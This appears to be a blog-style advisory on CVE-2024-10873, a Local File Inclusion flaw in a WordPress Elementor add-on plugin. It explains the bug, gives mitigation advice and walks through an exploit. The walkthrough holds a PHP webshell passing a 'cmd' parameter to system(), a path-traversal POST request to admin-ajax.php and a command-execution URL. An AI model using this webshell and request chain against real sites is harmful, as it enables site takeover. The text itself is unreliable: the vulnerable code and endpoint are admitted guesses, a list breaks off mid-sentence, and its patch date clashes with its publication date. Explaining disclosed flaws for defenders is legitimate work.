A serious security vulnerability, CVE-2024-10873, has been found in the popular LA-Studio Element Kit for Elementor WordPress plugin. All versions up to and including 1.4.2 are affected. This vulnerability allows authenticated users (Contributors or higher) to include arbitrary files from the server via a Local File Inclusion (LFI) bug in the vulnerable _load_template function. In simple terms, if you run this plugin on your website and let untrusted users log in, your website might be at risk of being hacked.
Let’s break down what this means, how it works, and how attackers might exploit it.
What Is Local File Inclusion (LFI)?
Local File Inclusion is a type of web vulnerability where an attacker tricks a website into loading files on the server that were never meant to be seen or executed. If the file is a PHP file, the attacker can potentially run code on the server. This can lead to information leaks, privilege escalation, or even taking control of the entire site.
Vulnerable Function: _load_template
The vulnerability lies in how the LA-Studio Element Kit plugin handles file loading through its internal _load_template function. Here's a simplified look at what the problematic code might look like:
public function _load_template($template_path) {
include $template_path;
}
If the $template_path parameter is not properly checked or sanitized, an attacker can control what file gets included. This is the heart of the LFI vulnerability.
Who Can Exploit This?
- Any logged-in user with Contributor-level access or higher can exploit this bug. By default, WordPress contributors can upload and edit their own posts but have limited access to the site's backend functions. However, that’s more than enough for this bug.
Attacker logs in as a contributor or higher.
2. The attacker uploads a malicious PHP file disguised as an image to the media library (for example, shell.php).
3. The attacker invokes the vulnerable function, telling it to include their uploaded file. The server then loads and executes their PHP code.
4. Now the attacker’s PHP code runs with the permissions of the WordPress process. This might let them:
Example Exploit (Step-by-step)
Let’s see what exploiting this might look like in practice.
Upload a simple PHP webshell as an image through the WordPress media uploader
// shell.php disguised with image header (to bypass checks)
<?php
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
?>
2. Find the File Path
WordPress stores uploaded files in the wp-content/uploads/ directory. Let’s say the shell gets saved as:
/var/www/html/wp-content/uploads/2024/06/shell.php
3. Trigger the Vulnerability
Send a request (as an authenticated user) to the vulnerable endpoint, passing the path of the shell.php file, for example:
POST /wp-admin/admin-ajax.php?action=la_studio_load_template HTTP/1.1
Host: yoursite.com
Cookie: wordpress_logged_in=...
Content-Type: application/x-www-form-urlencoded
template_path=../../../wp-content/uploads/2024/06/shell.php
With a webshell, use the browser to run commands
https://yoursite.com/wp-content/uploads/2024/06/shell.php?cmd=whoami
Mitigation
The recommended action is to update the LA-Studio Element Kit plugin to the latest safe version or disable and remove it if there is no patch (as of June 2024, 1.4.3+ should be patched — always check changelogs and official sources).
Restrict file uploads to trusted users only and never allow untrusted users to upload PHP or other executable files.
References
- Wordfence Advisory for CVE-2024-10873
- LA-Studio Element Kit - WordPress Plugin Page
- OWASP - Local File Inclusion
- Detailed CVE Entry at CVE.org
Summary
CVE-2024-10873 in the LA-Studio Element Kit for Elementor plugin is a critical vulnerability that could allow attackers with Contributor access to execute any PHP code on your site. The risk includes complete site takeover. Update or disable the plugin immediately if your site is affected, and ensure strict file upload permissions in your WordPress installation.
Stay safe, and always keep your plugins up to date!
Timeline
Published on: 11/23/2024 04:32:19 UTC